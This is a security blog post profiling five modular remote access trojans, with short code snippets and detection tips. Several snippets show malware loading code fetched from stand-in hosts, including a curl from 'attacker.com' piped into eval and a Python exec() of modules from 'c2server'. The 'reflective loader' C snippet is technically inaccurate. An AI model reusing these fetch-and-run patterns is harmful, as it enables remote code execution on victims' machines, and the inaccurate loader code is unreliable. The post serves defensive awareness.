SecureMyOrg logo
Talk to Us

Unstoppable Malware: Top 5 Modular Remote Access Trojans Dominating 2025

Modular Remote access Trojans

Modular Remote Access Trojans (RATs) are fast becoming the preferred toolset for cybercriminals due to their flexibility and adaptability. I’ve seen them evolve from simple backdoors into sophisticated frameworks that can load only the functionality they need at runtime, reducing detection risks and increasing stealth. This makes them more persistent and more dangerous. In this blog, I’ll walk you through five of the most formidable modular RATs active in 2025, show you some of the code-level tricks they use, and share the detection strategies I’ve personally used against them.

Before jumping into the list, let’s quickly clarify what modular RATs are and why they’re different from typical malware strains.

cybersecurity-consultation-securemyorg

-Book Your FREE Security Consultation Today!

Table of Contents

What Are Modular Remote Access Trojans?

Remote Access Trojan

Unlike traditional RATs, modular RATs come with a base payload and download additional modules as needed. This architecture makes them:

  • Stealthier: Only essential code runs initially.

  • Flexible: Attackers can swap in new modules without rewriting the whole trojan.

  • Scalable: The same base RAT can be used for multiple purposes, such as espionage, data theft, ransomware delivery, etc.

Here’s a simplified representation of how a modular RAT works in Python-like pseudocode:

				
					class ModularRAT:
    def __init__(self):
        self.modules = []

    def fetch_module(self, name):
        module_code = requests.get(f"http://c2server/modules/{name}.py").text
        exec(module_code)
        self.modules.append(name)

    def run(self):
        while True:
            task = self.get_command()
            self.execute_task(task)
Mobile Remote Access Trojans

Check out this blog on the TOP Mobile Remote Access Trojans

Let’s look at the top modular RATs that are making waves in 2025.

1. ModPipe v2

Overview: Originally known for targeting point-of-sale systems, ModPipe has evolved into a general-purpose modular RAT. The 2025 version supports encrypted communication, dynamic code loading, and kernel-level rootkits.

Implementation Strategy:

  • First drops a small loader binary.

  • Uses encrypted TLS tunnel to pull additional payloads.

  • Modules written in C++/Rust are injected directly into memory.

Code Walkthrough (Windows DLL Reflective Loader):

				
					HMODULE hMod = LoadLibrary("kernel32.dll");
FARPROC pLoad = GetProcAddress(hMod, "LoadLibraryA");
((void(*)())pLoad)((LPVOID)downloaded_module_bytes);

Detection Tip: Use tools like PE-sieve or Moneta to scan memory for injected code that doesn’t have a backing file. Signature-based detection won’t help here.

2. Octopus RAT

Overview: Octopus RAT is a .NET-based modular RAT that leverages Azure cloud storage to pull modules dynamically. It’s popular in APT campaigns against enterprise networks.

Implementation Strategy:

  • Initial stager is obfuscated with ConfuserEx.

  • Retrieves AES-encrypted modules from Azure blobs.

  • Uses AppDomain.AssemblyResolve to execute modules in memory.

Code Walkthrough:

				
					AppDomain.CurrentDomain.AssemblyResolve += (sender, args) => {
    byte[] encryptedBytes = DownloadFromAzure("module.dll.enc");
    byte[] dllBytes = Decrypt(encryptedBytes, key);
    return Assembly.Load(dllBytes);
};

Detection Tip: Look for custom handlers in AssemblyResolve and monitor connections to Azure domains from unknown executables.

3. CerberusX

Overview: CerberusX is a RAT built for persistence in Linux environments, especially in containerized workloads. It deploys modules as encrypted shell scripts or ELF binaries.

Implementation Strategy:

  • Uses cron jobs or systemd services for persistence.

  • Stores modules in hidden directories and decrypts at runtime.

  • Communicates over DNS tunneling.

Code Walkthrough (Module loader snippet):

				
					module=$(curl -s http://attacker.com/mod.sh | base64 -d)
eval "$module"

4. NexusCore

Overview: NexusCore is a multi-platform RAT (Windows, macOS, Linux) with a sophisticated modular structure. It supports plugin loading over gRPC and uses protobuf for communication.

Implementation Strategy:

  • Base binary is written in Golang.

  • Uses gRPC for C2, encrypted with TLS.

  • Plugins written in Go, Python, or Lua.

Code Walkthrough:

				
					type Module struct {
    Name string
    Code []byte
}

func LoadModule(m Module) {
    f, _ := os.Create("/tmp/" + m.Name)
    f.Write(m.Code)
    f.Close()
    exec.Command("chmod", "+x", "/tmp/"+m.Name).Run()
    exec.Command("/tmp/"+m.Name).Start()
}

Detection Tip: Look for unauthorized binary creation in /tmp or /var/tmp. Combine that with telemetry on outbound gRPC traffic to unknown domains.

5. HydraBlade

Overview: HydraBlade is an Android-focused modular RAT that loads payloads from GitHub or Pastebin, using steganography to hide the code.

Implementation Strategy:

  • Main APK requests camera and storage access.

  • Pulls modules encoded in images from public repos.

  • Decodes payload using custom stego-parser.

Code Walkthrough:

				
					Bitmap img = BitmapFactory.decodeStream(new URL(imgUrl).openStream());
String payload = StegoUtils.decode(img);
DexClassLoader loader = new DexClassLoader(payloadPath, optDir, null, getClassLoader());
Class<?> clazz = loader.loadClass("com.payload.SpyModule");

Detection Tip: Monitor APKs for runtime Dex loading. Any app pulling Dex files from remote sources after install is a red flag.

Final Thoughts

Modular RATs are like the Swiss army knives of cybercrime adaptable, stealthy, and highly effective. Each of the RATs mentioned here showcases just how diverse and powerful these tools have become in 2025.

From containerized environments to Android phones, nothing is off-limits anymore. Defending against them requires more than signature scanning. It demands behavioral monitoring, sandbox analysis, and a proactive approach to hunting down anomalies in your environment.

As attackers continue to refine their modular frameworks, defenders must do the same with detection and response. Keep your tools updated, monitor your network and memory space, and always assume attackers are innovating just as fast as we are.

If you’re tracking a specific RAT eg: Resolver RAT or want help developing detection rules, let’s connect I’m always up for diving into malware guts!

Why Businesses Trust SecureMyOrg for Comprehensive Network Security​

At SecureMyOrg, we uncover and fix all possible security vulnerabilities of mobile and web, while providing solutions to mitigate risks. We are trusted by renowned companies like Yahoo, Gojek and Rippling, and with 100% client satisfaction, you’re in safe hands!

cloudanix-logo-image
blinkit-logo-image
gojek-logo-image
Yahoo-logo-image
Rippling-logo-image
Spacebasic-logo-image
berryboxbenefits-logo-image

Some of the things people reach out to us for –

  1. Building their cybersecurity program from scratch – setting up cloud security using cost-effective tools, SIEM for alert monitoring, building policies for the company
  2. Vulnerability Assessment and Penetration Testing ( VAPT ) – We have certified professionals, with certifications like OSCP, CREST – CPSA & CRT, CKA and CKS
  3. DevSecOps consulting
  4. Red Teaming activity
  5. Regular security audits, before product release
  6. Full time security engineers.
Book Your Free Security Consultation Today

Relevant Posts

RATs Advanced Persistent Remote Access Trojans

Top 5 Advanced Persistent Remote Access Trojans (RATs) in 2025

April 24, 2025 No Comments

This blog explores five of the most sophisticated Advanced Persistent Remote Access Trojans (AP-RATs) currently active in the cyber threat landscape. We analyze their infection vectors, stealth mechanisms, command-and-control infrastructure, and persistence techniques to help security professionals understand and defend against these high-risk threats.

Read More »

Subscribe to our newsletter !

Talk to Us

Please fill the form for a prompt response!